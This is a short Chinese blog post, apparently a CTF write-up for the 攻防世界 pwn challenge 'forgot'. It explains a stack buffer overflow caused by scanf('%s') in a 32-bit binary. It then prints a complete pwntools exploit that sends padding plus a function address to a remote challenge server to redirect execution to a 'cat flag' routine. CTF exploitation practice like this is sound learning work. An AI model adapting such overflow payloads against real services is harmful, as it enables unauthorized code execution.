攻防世界2

樊少泽2024-10-13 22:21

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码 
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
小杨互联网3 分钟前
JAR逆向工程实战对比:传统工具 vs 自动化解决方案
运维·自动化·jar·jar自动逆向工具·jar逆向源码
热爱编程的OP10 分钟前
Linux进程池与管道通信详解:从原理到实现
linux·开发语言·c++
想学好C++的oMen1 小时前
文件基础IO
linux·服务器
早睡冠军候选人2 小时前
Ansible学习----管理复杂的 Play 和 Playbook 内容
运维·学习·云原生·ansible
Robpubking6 小时前
AWS 中 S3 的 server-side encryption 解释与说明
运维·aws
福旺旺6 小时前
Linux——解压缩各类文件
linux
MasterLi80238 小时前
我的读书清单
android·linux·学习
ha20428941948 小时前
Linux操作系统学习之---初识网络
linux·网络·学习
飞凌嵌入式8 小时前
【玩转多核异构】T153核心板RISC-V核的实时性应用解析
linux·嵌入式硬件·嵌入式·risc-v
陌路208 小时前
Linux 34TCP服务器多进程并发
linux·服务器·网络
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03UV安装并设置国内源04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06《大数据技术原理与应用》实验报告三 熟悉HBase常用操作07jdk21下载、安装(Windows、Linux、macOS)082025 最新教程:注册并切换到美区 Apple ID09综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件10智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践